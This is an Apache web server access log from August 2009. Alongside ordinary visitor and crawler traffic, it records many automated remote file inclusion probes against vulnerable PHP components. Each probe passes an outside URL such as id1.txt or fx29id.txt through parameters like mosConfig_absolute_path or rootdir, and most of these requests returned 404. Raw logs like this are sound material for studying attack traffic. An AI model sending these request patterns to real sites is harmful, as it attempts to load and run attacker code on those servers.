76.89.226.19 - - [02/Aug/2009:00:31:58 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727)"
76.89.226.19 - - [02/Aug/2009:00:31:58 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727)"
76.89.226.19 - - [02/Aug/2009:00:31:58 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727)"
110.45.138.139 - - [02/Aug/2009:00:32:04 -0400] "GET /logs/access_log.Q109071500//skin/ggambo7002_board/write.php?dir=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:00:32:04 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:00:32:04 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
76.89.226.19 - - [02/Aug/2009:00:32:39 -0400] "GET /images/pf-b.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727)"
72.29.70.19 - - [02/Aug/2009:00:32:47 -0400] "GET /logs/access_log.Q109070700//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://atelier-reza.com/administrator/components/com_virtuemart/oil2.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.812"
209.59.12.99 - - [02/Aug/2009:00:33:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.153.226.14 - - [02/Aug/2009:00:33:34 -0400] "GET //interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.libertybaptistofdc.org/webcalendar/includes/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.813"
217.153.226.14 - - [02/Aug/2009:00:33:34 -0400] "GET /logs/access_log.Q109062800//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.libertybaptistofdc.org/webcalendar/includes/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.813"
217.153.226.14 - - [02/Aug/2009:00:33:34 -0400] "GET /logs//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.libertybaptistofdc.org/webcalendar/includes/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.813"
72.29.70.19 - - [02/Aug/2009:00:33:46 -0400] "GET /logs/access_log.Q109070700//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://atelier-reza.com/administrator/components/com_virtuemart/oil2.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.812"
217.153.226.14 - - [02/Aug/2009:00:33:46 -0400] "GET /logs/access_log.Q109062800//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://203.157.127.5/districHO/amperpamok/banner/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.813"
217.153.226.14 - - [02/Aug/2009:00:33:46 -0400] "GET /logs//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://203.157.127.5/districHO/amperpamok/banner/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.813"
217.153.226.14 - - [02/Aug/2009:00:33:46 -0400] "GET //interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://203.157.127.5/districHO/amperpamok/banner/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.813"
66.249.71.201 - - [02/Aug/2009:00:33:46 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0048644B1D22B100301E04S+WSEQ(S0060):1+OUITEM(A0200):04941301 HTTP/1.1" 200 27017 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
110.45.138.139 - - [02/Aug/2009:00:34:02 -0400] "GET /logs/access_log.Q109071500%20%20//skin/ggambo7002_board/write.php?dir=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:00:34:32 -0400] "GET //interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.skch.or.kr/board/data/__session_tmp/misc/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.813"
217.153.226.14 - - [02/Aug/2009:00:34:32 -0400] "GET /logs/access_log.Q109062800//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.skch.or.kr/board/data/__session_tmp/misc/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.813"
217.153.226.14 - - [02/Aug/2009:00:34:32 -0400] "GET /logs//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.skch.or.kr/board/data/__session_tmp/misc/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.813"
217.153.226.14 - - [02/Aug/2009:00:34:33 -0400] "GET /logs/access_log.Q109070700//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.libertybaptistofdc.org/webcalendar/includes/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.813"
217.153.226.14 - - [02/Aug/2009:00:34:41 -0400] "GET /logs/access_log.Q109070700//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://203.157.127.5/districHO/amperpamok/banner/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.813"
217.153.226.14 - - [02/Aug/2009:00:35:21 -0400] "GET /logs/access_log.Q109070700//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.skch.or.kr/board/data/__session_tmp/misc/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.813"
110.45.138.139 - - [02/Aug/2009:00:35:53 -0400] "GET /logs/access_log.Q109072400//skin/ggambo7002_board/write.php?dir=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
119.245.138.143 - - [02/Aug/2009:00:35:59 -0400] "GET /logs/access_log.Q109062800//language.php?rootdir=http://mp3dolls.dp.ua/config/ec.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
119.245.138.143 - - [02/Aug/2009:00:35:59 -0400] "GET //language.php?rootdir=http://mp3dolls.dp.ua/config/ec.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
119.245.138.143 - - [02/Aug/2009:00:36:00 -0400] "GET /logs//language.php?rootdir=http://mp3dolls.dp.ua/config/ec.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
119.245.138.143 - - [02/Aug/2009:00:36:20 -0400] "GET /logs/error_log.Q109062800//language.php?rootdir=http://mp3dolls.dp.ua/config/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
209.59.12.99 - - [02/Aug/2009:00:38:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.118.117.124 - - [02/Aug/2009:00:39:18 -0400] "GET /logs/access_log.Q109052700////////?mosConfig_absolute_path=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.118.117.124 - - [02/Aug/2009:00:39:18 -0400] "GET ////////?mosConfig_absolute_path=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 200 458 "-" "Mozilla/5.0"
87.118.117.124 - - [02/Aug/2009:00:39:18 -0400] "GET /logs/access_log.Q109051000////////?mosConfig_absolute_path=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.118.117.124 - - [02/Aug/2009:00:39:18 -0400] "GET /logs////////?mosConfig_absolute_path=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 200 12015 "-" "Mozilla/5.0"
87.118.117.124 - - [02/Aug/2009:00:40:16 -0400] "GET /logs/access_log.Q109052700%20%20////////?mosConfig_absolute_path=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.118.117.124 - - [02/Aug/2009:00:40:16 -0400] "GET /logs/access_log.Q109051000%20%20////////?mosConfig_absolute_path=http://utenti.lycos.it/roxe/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:00:41:38 -0400] "GET /logs/access_log.Q109071000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 298 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
141.223.5.11 - - [02/Aug/2009:00:41:39 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
141.223.5.11 - - [02/Aug/2009:00:41:57 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 298 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [02/Aug/2009:00:43:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
141.223.5.11 - - [02/Aug/2009:00:43:43 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:43:55 -0400] "GET /logs/access_log.Q109071000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:43:55 -0400] "GET /logs/access_log.Q109071000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/idfellscan.txt???? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:43:56 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:43:56 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/idfellscan.txt???? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:43:56 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:43:56 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/idfellscan.txt???? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
174.143.240.203 - - [02/Aug/2009:00:44:27 -0400] "GET /logs//language.php?rootdir=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
174.143.240.203 - - [02/Aug/2009:00:44:27 -0400] "GET //language.php?rootdir=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
59.24.49.35 - - [02/Aug/2009:00:44:51 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:00:44:51 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:00:44:51 -0400] "GET /logs/access_log.Q109071000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:00:44:53 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:00:44:54 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:00:44:54 -0400] "GET /logs/access_log.Q109071000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:00:45:32 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:00:45:37 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
72.30.81.182 - - [02/Aug/2009:00:46:21 -0400] "GET /logs/access_log.Q109052400 HTTP/1.0" 200 2479154 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
141.223.5.11 - - [02/Aug/2009:00:46:50 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:46:50 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/idfellscan.txt???? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:47:09 -0400] "GET /logs/access_log.Q109071000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/aldiid.txt??? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:47:09 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/aldiid.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:47:10 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/aldiid.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:47:26 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:00:47:26 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:00:47:27 -0400] "GET /logs/access_log.Q109071000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/fx29id.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:00:47:28 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/fx29id.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:00:48:00 -0400] "GET /logs/access_log.Q109071000%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:00:48:05 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:00:48:19 -0400] "GET /logs/access_log.Q109071000%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:00:48:24 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:00:48:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.138.139 - - [02/Aug/2009:00:48:41 -0400] "GET /logs/access_log.Q109070100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:00:48:41 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:00:48:41 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:00:49:05 -0400] "GET /logs/access_log.Q109062600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:00:49:52 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/aldiid.txt??? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:50:22 -0400] "GET /logs/access_log.Q109071000%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:00:50:26 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:00:51:06 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/aldiid.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
210.220.213.203 - - [02/Aug/2009:00:51:06 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:00:51:06 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:00:51:09 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:00:51:09 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:00:51:14 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:00:51:14 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:00:51:14 -0400] "GET /logs/access_log.Q109072700%20%20//bemarket/postscript/postscript.php?p_mode=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:00:51:20 -0400] "GET /logs/access_log.Q109071600//bemarket/postscript/postscript.php?p_mode=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:00:51:20 -0400] "GET /logs/error_log.Q109060700%20%20//bemarket/postscript/postscript.php?p_mode=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:00:51:23 -0400] "GET /logs/access_log.Q109071600//bemarket/postscript/postscript.php?p_mode=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:00:52:36 -0400] "GET /logs/access_log.Q109071000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif?? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:52:36 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
141.223.5.11 - - [02/Aug/2009:00:52:37 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
210.220.213.203 - - [02/Aug/2009:00:53:12 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:00:53:12 -0400] "GET /logs/access_log.Q109072700//bemarket/postscript/postscript.php?p_mode=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:00:53:12 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:00:53:29 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:00:53:29 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:00:53:29 -0400] "GET /logs/access_log.Q109072700//bemarket/postscript/postscript.php?p_mode=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:00:53:37 -0400] "GET /logs/error_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.246.20.221 - - [02/Aug/2009:00:54:27 -0400] "GET //language.php?rootdir=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
218.246.20.221 - - [02/Aug/2009:00:54:27 -0400] "GET /logs/access_log.Q109062800//language.php?rootdir=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
218.246.20.221 - - [02/Aug/2009:00:54:27 -0400] "GET /logs//language.php?rootdir=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
218.246.20.221 - - [02/Aug/2009:00:54:27 -0400] "GET /logs/error_log.Q109062800//language.php?rootdir=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
210.220.213.203 - - [02/Aug/2009:00:54:36 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.220.213.203 - - [02/Aug/2009:00:54:36 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:00:55:22 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif?? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
218.246.20.221 - - [02/Aug/2009:00:55:33 -0400] "GET /logs//language.php?rootdir=http://www.hit168.com.cn/im/ID.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
218.246.20.221 - - [02/Aug/2009:00:55:38 -0400] "GET /logs/access_log.Q109062800%20//language.php?rootdir=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
218.246.20.221 - - [02/Aug/2009:00:55:38 -0400] "GET /logs/error_log.Q109062800%20//language.php?rootdir=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
110.45.138.139 - - [02/Aug/2009:00:59:43 -0400] "GET /logs/access_log.Q109070100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
207.200.116.66 - - [02/Aug/2009:00:59:54 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 120309 "-" "Moozilla"
